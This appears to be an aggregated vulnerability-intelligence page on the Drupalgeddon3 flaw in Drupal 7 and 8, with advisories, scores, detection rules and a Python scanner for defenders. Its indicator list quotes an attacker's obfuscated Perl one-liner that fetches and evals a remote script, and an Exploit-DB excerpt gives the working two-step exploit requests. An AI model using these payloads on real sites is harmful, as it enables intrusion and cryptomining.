CVE-2018-7602
published 2018-07-19
Priority: P197 · critical · 9.8 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-05-04
Exploited in the wild
EPSS: 99.24% (99.9th percentile)
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| drupal | core | >= 7.0 < 7.59 | 7.59 |
| drupal | core | >= 8.0 < 8.4.8 | 8.4.8 |
| drupal | core | >= 8.0.0 < 8.4.8 | 8.4.8 |
| drupal | core | >= 8.5 < 8.5.3 | 8.5.3 |
| drupal | core | >= 8.5.0 < 8.5.3 | 8.5.3 |
| drupal | core | >= unspecified < 7.59 | 7.59 |
| drupal | core | >= unspecified < 8.5.3 | 8.5.3 |
| drupal | core | >= unspecified < 8.4.8 | 8.4.8 |
| drupal | drupal | — | — |
| drupal | drupal | >= 7.0 < 7.59 | 7.59 |
| drupal | drupal | >= 7.0 < 7.59 | 7.59 |
| drupal | drupal | >= 8.0 < 8.4.8 | 8.4.8 |
| drupal | drupal | >= 8.4.0 < 8.4.8 | 8.4.8 |
| drupal | drupal | >= 8.5 < 8.5.3 | 8.5.3 |
| drupal | drupal | >= 8.5.0 < 8.5.3 | 8.5.3 |
| drupal | drupal_core | — | — |
Detection & IOCs (extracted from sources)
- command: `sh -c p$(printf e)rl -e 'BEGIN{$0=$$};use IO::Socket::INET;if(my$c=new IO::Socket::INET(PeerAddr=>"147.52.43.159:80")){print $c $_."\r\n" for (q{GET /sites/z.html HTTP/1.1},q{Host:147.52.43.159},q{User-Agent: Mozilla/5.0},q{});my$x;{local$/=undef;$x=};while($x=~s/(.*)\r\n//){last if$x=~/^$/;}eval($x);}'`
- url: `/?q=user%2Flogin`
- url: `/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}}`
- command: `/?q={{userid}}/cancel&destination={{userid}}/cancel?q[#post_render][]=passthru&q[#type]=markup&q[#markup]=echo COP-2067-8102-EVC | rev`
- The exploit chain uses the `destination` parameter with a `#post_render` callback set to `passthru` to achieve RCE — look for URL-encoded `%23post_render` or literal `#post_render` in Drupal HTTP requests targeting `/cancel` endpoints.
- Post-exploitation: watch for Apache worker processes spawning `sh -c perl` or the obfuscated `p$(printf e)rl` shell command downloading remote Perl scripts.
- The exploit uses the `file/ajax/actions/cancel/#options/path/` endpoint with a `form_build_id` parameter — monitor for POST requests to this Drupal AJAX path.
- The Shodan query `http.component:"drupal"` can be used to identify exposed Drupal instances for proactive scanning of your own estate.
- Multiple Perl processes running simultaneously with `monero7` as a parameter are a strong indicator of post-exploitation cryptomining activity.
- The attack hides the `perl` invocation using shell obfuscation (`p$(printf e)rl`) to evade simple string-match detections on process names.
- The Perl script embeds 16 hex-encoded, GZIP-compressed ELF objects that are loaded at runtime — file-based detections must cover both the compressed and decompressed versions of each ELF object.
- CVE-2018-7602 exploitation requires an authenticated session (a valid Drupal login) as part of the exploit chain — the PoC template performs a login step before triggering RCE.
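A defensive check for the request shapes and process indicators listed above, as an added example that is not taken from any of the page's sources: it percent-decodes the request URI twice (so `%23`, `%2523` and `#` all compare equal), matches the `destination=` / `#post_render` and `file/ajax/actions/cancel/#options/path/` shapes in web-server access-log lines, and flags the `p$(printf e)rl` obfuscation, a web-server worker spawning `sh -c ... perl`, and the `monero7` miner argument in a process listing. The log lines, the process table and the `WEB_WORKERS` set are constructed for the example and are assumptions, not data from the page.

```python
import re
from urllib.parse import unquote

# Request shapes quoted on this page for CVE-2018-7602 (Drupalgeddon3). The URI
# is percent-decoded twice before matching so "%23", "%2523" and "#" all match.
WEB_RULES = [
    ("drupalgeddon3-destination",
     re.compile(r"destination=\S*(?:#(?:post_render|pre_render|type|markup)|\[#\])", re.I)),
    ("drupalgeddon3-ajax-cancel",
     re.compile(r"\bfile/ajax/actions/cancel/#options/path/", re.I)),
]

# Process-level indicators from the post-exploitation activity described above.
PROC_RULES = [
    ("obfuscated-perl", re.compile(r"p\$\(printf e\)rl")),    # literal p$(printf e)rl
    ("webworker-sh-perl", re.compile(r"^sh -c .*\bperl\b")),  # only when parent is a web worker
    ("monero7-miner", re.compile(r"\bmonero7\b")),
]

# Constructed set of web-server worker process names (an assumption for the example).
WEB_WORKERS = {"apache2", "httpd", "nginx", "php-fpm"}


def decode_uri(uri: str) -> str:
    """Percent-decode twice so a double-encoded %2523 becomes '#'."""
    return unquote(unquote(uri))


def scan_web_log(lines):
    """Return (line_no, rule_name) for access-log lines matching the request shapes."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        uri = decode_uri(m.group(1))
        for name, rx in WEB_RULES:
            if rx.search(uri):
                hits.append((n, name))
    return hits


def scan_processes(procs):
    """procs: iterable of (parent_name, cmdline). Return (cmdline, rule_name) hits."""
    hits = []
    for parent, cmd in procs:
        for name, rx in PROC_RULES:
            if not rx.search(cmd):
                continue
            # A shell running perl is only suspicious when a web worker spawned it.
            if name == "webworker-sh-perl" and parent not in WEB_WORKERS:
                continue
            hits.append((cmd, name))
    return hits


# Constructed sample data (not real traffic); the shapes follow the IOCs listed above.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Apr/2018:10:00:01 +0000] "GET /?q=user%2Flogin HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Apr/2018:10:00:02 +0000] "POST /?q=node/99/delete&destination=node'
    '?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1" 302 0',
    '203.0.113.5 - - [25/Apr/2018:10:00:03 +0000] "POST /?q=file/ajax/actions/cancel/'
    '%23options/path/form-EXAMPLE HTTP/1.1" 200 2048',
    '198.51.100.7 - - [25/Apr/2018:10:00:04 +0000] "GET /?q=node/5 HTTP/1.1" 200 9000',
]

SAMPLE_PROCS = [
    ("apache2", "sh -c p$(printf e)rl -e 'BEGIN{$0=$$};use IO::Socket::INET;'"),
    ("apache2", "sh -c perl /tmp/x.pl"),
    ("bash", "perl miner.pl -a monero7 -o stratum+tcp://pool.example:3333"),
    ("cron", "sh -c /usr/bin/perl /usr/lib/cgi-bin/report.pl"),  # benign: parent is cron
]

if __name__ == "__main__":
    for n, rule in scan_web_log(SAMPLE_LOG):
        print(f"log line {n}: {rule}")
    for cmd, rule in scan_processes(SAMPLE_PROCS):
        print(f"process {cmd!r}: {rule}")
```

The fourth process entry shows why the parent-process condition matters: the same `sh -c ... perl` command line is not flagged when cron, rather than a web worker, spawned it.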
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 9.8 | CRITICAL | — |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
| vendor_ubuntu | — | 3.5 | LOW | — |
OSV
Drupal Core Remote Code Execution Vulnerability
osv·2024-04-23·CRITICAL
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
GHSA
Drupal Core Remote Code Execution Vulnerability
ghsa·2024-04-23·CRITICAL·CWE-94
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
OSV
drupal7 vulnerabilities
osv·2021-03-15·CVSS 3.5·LOW (record filed under CVE-2018-7600)
It was discovered that Drupal did not properly process certain input. An attacker could use this vulnerability to execute arbitrary code or completely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)
It was discovered that password reset URLs in Drupal could be forged. An attacker could use this vulnerability to gain access to another user's account. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)
It was discovered that Drupal did not properly protect against open redirects. An attacker could use this vulnerability to send unsuspecting users to third-party sites and potentially carry out phishing attacks. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)
OSV
CVE-2018-7602: A remote code execution vulnerability exists within multiple subsystems of Drupal 7
osv·2018-07-19·CVSS 9.8·CRITICAL
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
OSV
CVE-2018-7602: A remote code execution vulnerability exists within multiple subsystems of Drupal 7
osv·2018-04-25
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to [Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002](/sa-core-2018-002). Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
*Updated — this vulnerability is being exploited in the wild.*
VulnCheck
Drupal Core Remote Code Execution Vulnerability
vulncheck·2018·CVSS 9.8·CRITICAL
A remote code execution vulnerability exists within multiple subsystems of Drupal that can allow attackers to exploit multiple attack vectors on a Drupal site.
Affected: Drupal Drupal Core
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References:
- https://www.cve.org/CVERecord?id=CVE-2018-7602
- https://www.csk.gov.in/alerts/STOP_ransomware.html
- https://know.netenrich.com/blog/ragnar-locker-petya-and-ryuk-know-your-ransomware/
- https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://www.group-ib.com/blog/shadowsilk/
- https://fortiguard.fortinet.com/threat-signal-report/619
CISA
Drupal Core Remote Code Execution Vulnerability
cisa·2022-04-13·CVSS 9.8·CRITICAL
Vulnerability: Drupal Core Remote Code Execution Vulnerability
Affected: Drupal Core
A remote code execution vulnerability exists within multiple subsystems of Drupal that can allow attackers to exploit multiple attack vectors on a Drupal site.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-7602
Remediation Due Date: 2022-05-04
Ubuntu
Drupal vulnerabilities
vendor_ubuntu·2021-03-15·CVSS 3.5·LOW (record filed under CVE-2018-7600)
Summary: Several security issues were fixed in Drupal.
It was discovered that Drupal did not properly process certain input. An attacker could use this vulnerability to execute arbitrary code or completely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)
It was discovered that password reset URLs in Drupal could be forged. An attacker could use this vulnerability to gain access to another user's account. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)
It was discovered that Drupal did not properly protect against open redirects. An attacker could use this vulnerability to send unsuspecting users to third-party sites and potentially carry out phishing attacks. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)
Instru
Drupal
Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004
vendor_drupal·2018-04-25·CRITICAL
Vulnerability Type: Remote Code Execution
Description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Updated — this vulnerability is being exploited in the wild.
Solution: Upgrade to the most recent version of Drupal 7 or 8 core. If you are running 7.x, upgrade to Drupal 7.59. If you are running 8.5.x, upgrade to Drupal 8.5.3. If you are run
Drupal
Drupal 7 and 8 core critical release on April 25th, 2018 - PSA-2018-003
vendor_drupal·2018-04-23·CVSS 9.8·CRITICAL
Vulnerability Type: Drupal 7 and 8 core critical release on April 25th, 2018
Description: There will be a security release of Drupal 7.x, 8.4.x, and 8.5.x on April 25th, 2018 between 16:00 and 18:00 UTC. This PSA is to notify that the Drupal core release is outside of the regular schedule of security releases. For all security updates, the Drupal Security Team urges you to reserve time for core updates at that time because there is some risk that exploits might be developed within hours or days. Security release announcements will appear on the Drupal.org security advisory page. This security release is a follow-up to the one released as SA-CORE-2018-002 on March 28. Sites on 7.x or 8.5.x can immediately update
Suricata
ET WEB_SPECIFIC_APPS Drupal RCE (CVE-2018-7602)
suricata·2018-04-26·CVSS 9.8·CRITICAL
Rule:
```suricata
alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Drupal RCE (CVE-2018-7602)"; flow:established,to_server; http.method; content:"POST"; nocase; http.uri; content:"/?q=node"; content:"delete&destination="; pcre:"/(?:%(?:25)?23|#)/"; http.request_body; content:"form_id=node_delete_confirm"; fast_pattern; reference:url,www.bleepingcomputer.com/news/security/hackers-dont-give-site-owners-time-to-patch-start-exploiting-new-drupal-flaw-within-hours; reference:cve,2018-7602; classtype:attempted-user; sid:2025533; rev:4; metadata:affected_product Drupal_Server, attack_target Web_Server, created_at 2018_04_26, deployment Datacenter, signature_severity Minor, tag drupalgeddon, tag CISA_KEV, updated_at 2024_03_07;)
```
Exploit-DB
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)
exploitdb·2018-04-30·CVSS 9.8·CRITICAL
Module metadata excerpt (truncated in the source):
```ruby
        Drupal 'Drupalgeddon3',
        'Description' => %q{
          CVE-2018-7602 / SA-CORE-2018-004
          A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.
          This potentially allows attackers to exploit multiple attack vectors on a Drupal site
          Which could result in the site being compromised.
          This vulnerability is related to Drupal core - Highly critical - Remote Code Execution
          The module can load msf PHP arch payloads, using the php/base64 encoder.
          The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'SixP4ck3r', # Research and port to MSF
            'Blaklis'    # Initial PoC
          ],
        'References' =>
          [
            ['SA-CORE', '2018-004'],
            ['CVE', '2018-7602'],
          ],
        'DefaultOptions' =>
          {
            'encoder' => 'php/base64',
            'payload' => 'p
```
Exploit-DB
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)
exploitdb·2018-04-25·CVSS 9.8·CRITICAL
---
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
You must be authenticated and have the power to delete a node. Some other forms may be vulnerable: at least, all forms that are in two steps (form then confirm).
```http
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
```
Retrieve the form_build_id from the response, and then trigger the exploit with:
```http
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
```
This will display the result of the whoami com
Nuclei
Drupal - Remote Code Execution
nuclei·CVSS 9.8·CRITICAL
Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
Template (truncated in the source):
```yaml
id: CVE-2018-7602
info:
  name: Drupal - Remote Code Execution
  author: princechaddha
  severity: critical
  description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in
```
Bugzilla
CVE-2018-7602 drupal7: drupal: Remote code execution vulnerability SA-CORE-2018-004 [fedora-all]
bugzilla·2018-04-26·CVSS 9.8·CRITICAL
This is an automatically created tracking bug! It was created to ensure that one or more security vulnerabilities are fixed in affected versions of fedora-all.
For comments that are specific to the vulnerability please use bugs filed against the "Security Response" product referenced in the "Blocks" field.
For more information see: http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next comment(s). This will include the bug IDs of this tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the fedpkg commit message.
NOTE: this issue affects multiple
Bugzilla
CVE-2018-7602 drupal8: drupal: Remote code execution vulnerability SA-CORE-2018-004 [fedora-all]
bugzilla·2018-04-26·CVSS 9.8·CRITICAL
Bugzilla
CVE-2018-7602 drupal: Remote code execution vulnerability SA-CORE-2018-004
bugzilla·2018-04-26·CVSS 9.8·CRITICAL
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised.
Upstream patches:
Drupal 8.x: https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=bb6d396609600d1169da29456ba3db59abae4b7e
Drupal 7.x: https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=080daa38f265ea28444c540832509a48861587d0
External References:
https://www.drupal.org/sa-core-2018-004
Discussion:
Created drupal8 tracking bugs for this issue:
Affects: fedora-all [bug 1572101]
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1572100]
Affects: epel-all
Bugzilla
CVE-2018-7602 drupal7: drupal: Remote code execution vulnerability SA-CORE-2018-004 [epel-all]
bugzilla·2018-04-26·CVSS 9.8·CRITICAL
This is an automatically created tracking bug! It was created to ensure that one or more security vulnerabilities are fixed in affected versions of epel-all.
For comments that are specific to the vulnerability please use bugs filed against the "Security Response" product referenced in the "Blocks" field.
For more information see: http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next comment(s). This will include the bug IDs of this tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the fedpkg commit message.
NOTE: this issue affects multiple sup
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present ATTACK2VEC, a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test ATTACK2VEC on a dataset of billions of security events collected from the c
Tenable
CVE-2026-9082: Highly Critical SQL Injection Vulnerability in Drupal Core (SA-CORE-2026-004)
blogs_tenable·2026-05-21·CVSS 6.5·MEDIUM
A highly critical SQL injection vulnerability in Drupal core's database abstraction layer affects sites running PostgreSQL.
## Key Takeaways
CVE-2026-9082 is a highly critical SQL injection vulnerabi
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5·HIGH (record filed under CVE-2020-28188)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a deep dive into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5·HIGH
Authors: Lei Xu, Yue Guan, Vaibhav Singhal. Published: April 12, 2021.
Tenable
Drupalgeddon Attacks Continue on Sites Missing Security Updates (CVE-2018-7600, CVE-2018-7602)
blogs_tenable·2018-11-20·CVSS 9.8·CRITICAL
Tenable
Drupalgeddon Attacks Continue on Sites Missing Security Updates (CVE-2018-7600, CVE-2018-7602)
blogs_tenable·2018-11-20·CVSS 7.0·HIGH (record filed under CVE-2018-7600)
Satnam Narang, November 20, 2018
Recent attacks targeting Drupal instances vulnerable to Drupalgeddon 2 and Drupalgeddon 3 highlight the importance of identifying and patching vulnerable sites.
#### Background
In March 2018, Drupal published a security advisory, SA-CORE-2018-002, that addressed a critical Remote Code Execution (RCE) vulnerability with the CVE identifier CVE-2018-7600. Tenable's Security Response Team published a blog as well.
A few weeks after the publication of this security advisory, researchers at Check Point Software Technologies and Dofinity published “Uncovering Drupalgeddon 2.0,” providing technical details about C
Sentinelone
Drupal Exploit on Linux - SentinelOne Detection and Response Case Study
blogs_sentinelone·2018-06-26·CVSS 9.8·CRITICAL
## Introduction
SentinelOne Vigilance is a managed service provided by a group of highly trained cyber security analysts. It offers another layer of security to IT teams by accelerating the detection, prioritization, and response to advanced cyber threats and reducing the risk of missing a critical alert that goes undetected. The Vigilance analysts assess the suspicious alerts, review raw threat data, process operations, and network connections, and analyze samples, as needed. They also correlate the information with threat intelligence feeds, analyze low level log data, and collaborate with security researchers to identify and prioritize events. Quite often the group investigates interesting cases. A recent Vigilance case is the subject of this article.
Recently, SentinelOne was called
Trendmicro
Drupal Bug Exploited to Deliver Monero-Mining Malware
blogs_trendmicro·2018-06-21·CVSS 9.8·CRITICAL
Malware
By: Smart Home Network Team, IoT Reputation Service Team, 2018/06/21
We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots. Of note are its ways of hiding behind the Tor network to elude detection and how it checks the affected system first before infecting it with a cryptocurrency-mining malware. While these attacks c
- http://www.securityfocus.com/bid/103985
- http://www.securitytracker.com/id/1040754
- https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html
- https://www.debian.org/security/2018/dsa-4180
- https://www.drupal.org/sa-core-2018-004
- https://www.exploit-db.com/exploits/44542/
- https://www.exploit-db.com/exploits/44557/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-7602
Published: 2018-07-19
Added to CISA KEV: 2022-04-13
Exploited in the wild